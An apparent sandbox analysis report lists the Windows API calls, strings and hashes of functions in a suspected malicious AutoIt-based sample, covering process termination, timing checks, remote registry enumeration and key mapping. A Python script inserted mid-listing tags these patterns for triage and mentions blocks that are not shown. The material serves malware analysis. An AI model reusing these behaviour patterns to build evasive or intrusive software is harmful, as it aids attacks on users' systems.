                    • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                    • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                    • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                    • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                    • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                    • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                    • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                    • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                    • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                    • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                      • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                    • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                    • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                    • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                    • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                    • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                    • CloseHandle.KERNEL32(?), ref: 004589B2
                    • CloseHandle.KERNEL32(?), ref: 004589BA
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                    • HeapFree.KERNEL32(00000000), ref: 004589CA
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                    • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                    • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                    • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                    • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                    • _memcmp.LIBCMT ref: 00457748
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,I
                    • API String ID: 314563124-4163367948
                    • Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                    • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                    • Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
                    • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00478613
                    • CharUpperBuffW.USER32(?,?), ref: 00478722
                    • VariantClear.OLEAUT32(?), ref: 0047889A
                      • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                      • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                      • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                    • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                    • Opcode Fuzzy Hash: b79f97b11a7d6962d372d0a4ccb284e4fc5bcf694c6e8e9d1ab55c8386d04fc1
                    • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                    APIs
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • _memset.LIBCMT ref: 00462B87
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                    • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                    • Opcode Fuzzy Hash: 1e6fa2a49a488f254265f36d46fe35a5d3fb861dcdb7802ee261f915d41c9b2e
                    • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                    APIs
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: 3cA$_A
                    • API String ID: 2620147621-3480954128
                    • Opcode ID: 29ba2e6d6ac1f8e982579788886c3a5f766b12424a56cb2cacd2ebd99f17abb9
                    • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                    • Opcode Fuzzy Hash: 29ba2e6d6ac1f8e982579788886c3a5f766b12424a56cb2cacd2ebd99f17abb9
                    • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                    APIs
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: 3cA$ERCP
                    • API String ID: 2532777613-1471582817
                    • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                    • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                    • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                    • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                    APIs
                    • _memset.LIBCMT ref: 004627C0
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                    • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                    • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                    • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                      • Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                    • Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
                    • Opcode Fuzzy Hash: 48841afb82c51e77e65a662f9d15771e824929b8a1eaa9af7586ff6945600f8e
                    • Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                    • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                    • Opcode Fuzzy Hash: e030b1596512d39921eca084f9a774937031f989f7830630dd714e1b2177fac3
                    • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                    APIs
                      • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                      • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                      • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                    • LoadLibraryW.KERNEL32(?), ref: 00486468
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                    • DestroyWindow.USER32(?), ref: 00486485
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                    • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                    • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                    • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                    • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                    • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                    • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                    • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                    • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                    • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                    • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                    • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                    • __swprintf.LIBCMT ref: 0046ACC1
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                    • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                    • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                    • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID: @F
                    • API String ID: 2875609808-2781531706
                    • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                    • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                    • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                    • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                    • CloseHandle.KERNEL32(?), ref: 0047EDEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                    • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                    • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                    • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                    • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                    • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                    • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                    • Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
                    • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
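The function blocks above all share one fixed layout: bulleted API calls with a `ref:` address (a "Part of subcall function" prefix marks a callee's API rather than the function's own), followed by `API ID`, `String ID`, `Opcode ID` and fuzzy-hash lines, the last of which closes the block. The following Python script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses blocks in that layout and tags API combinations worth a second look, such as the QueryPerformanceCounter/Sleep pair at 0046115F, the OpenProcess(0x410)/GetProcessMemoryInfo inspection at 0047EC07 (decoding 0x410 into the standard PROCESS_VM_READ and PROCESS_QUERY_INFORMATION rights) and the RegConnectRegistryW/RegEnumKeyExW enumeration at 004800FD; it also recognises the PostMessageW 0x201/0x202 click and GetAsyncKeyState polls that appear in later blocks on this page. The sample text is constructed from three blocks above and trimmed to the lines the parser reads; the tag names are the example's own labels, not verdicts from the report.

```python
import re
from collections import namedtuple

# Constructed sample in this report's function-block layout (bulleted calls with
# "ref:" addresses, then ID lines); three blocks from above, trimmed to what the parser reads.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
Memory Dump Source
• Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: CounterPerformanceQuerySleep
• String ID: @F
• Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
• CloseHandle.KERNEL32(?), ref: 0047EDEB
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
• RegCloseKey.ADVAPI32(00000000), ref: 004801BC
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
"""

# A call line: optional "Part of subcall function X:" prefix, Name.MODULE, optional (args), "ref: addr".
API_RE = re.compile(r"^(?P<sub>Part of subcall function [0-9A-Fa-f]+: )?(?P<name>[A-Za-z_]\w*)"
                    r"\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")      # "API ID: ...", "String ID:" ...
Call = namedtuple("Call", "name module args ref subcall")        # subcall: callee's API, not this function's

def parse_blocks(text):
    """Split the listing into per-function dicts {'calls': [Call], 'meta': {key: value}}."""
    funcs, cur = [], {"calls": [], "meta": {}}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue                                   # section captions carry no data
        m = API_RE.match(line[1:].strip())
        if m:
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            cur["calls"].append(Call(m["name"], m["mod"], args, m["ref"].upper(), bool(m["sub"])))
            continue
        m = KV_RE.match(line[1:].strip())
        if m:
            cur["meta"][m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":     # last line of every complete block
                funcs.append(cur)
                cur = {"calls": [], "meta": {}}
    if cur["calls"] or cur["meta"]:
        funcs.append(cur)                                # keep a truncated final block
    return funcs

# Standard Windows process access rights; OpenProcess's first argument is a mask of these.
PROCESS_RIGHTS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
                  0x100000: "SYNCHRONIZE"}

def decode_access(arg):
    """Hex mask from the listing -> right names; an unresolved '?' argument yields []."""
    try:
        mask = int(arg, 16)
    except ValueError:
        return []
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]

def flag(func):
    """Tag a function by API combination. Tag names are this example's own labels."""
    own = [c for c in func["calls"] if not c.subcall]
    names = {c.name for c in own}
    tags = []
    if names & {"QueryPerformanceCounter", "GetTickCount"} and "Sleep" in names:
        tags.append("timing-check")                      # timer read on both sides of a Sleep
    for c in own:
        if c.name == "OpenProcess" and c.args:
            tags.append("open-process:" + "|".join(decode_access(c.args[0])))
        if c.name == "PostMessageW" and len(c.args) > 1 and c.args[1] in ("00000201", "00000202"):
            tags.append("synthetic-click")               # WM_LBUTTONDOWN / WM_LBUTTONUP posted
    if {"RegConnectRegistryW", "RegEnumKeyExW"} <= names:
        tags.append("remote-registry-enum")
    if "GetAsyncKeyState" in names:
        tags.append("input-state-poll")
    return tags

def triage(text):
    """Map each tagged function, keyed by the address of its first own call, to its tags."""
    out = {}
    for f in parse_blocks(text):
        tags = flag(f)
        if tags:
            out[next((c.ref for c in f["calls"] if not c.subcall), "?")] = tags
    return out
```

Calling `triage(SAMPLE)` returns `{"0046115F": ["timing-check"], "0047EC07": ["open-process:PROCESS_VM_READ|PROCESS_QUERY_INFORMATION"], "004800FD": ["remote-registry-enum"]}`. The parser keys on bullets only, so the `Strings`, `Memory Dump Source` and `Similarity` captions are ignored, and the `Instruction Fuzzy Hash` line is treated as the block terminator; a final block cut off before that line (as at the end of this section) is still kept. Subcall lines are parsed but excluded from tagging, since they describe the callee's behaviour. The tags are starting points for a reviewer, not a classification: AutoIt's runtime wraps many of these same API combinations for benign script functions.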
                    APIs
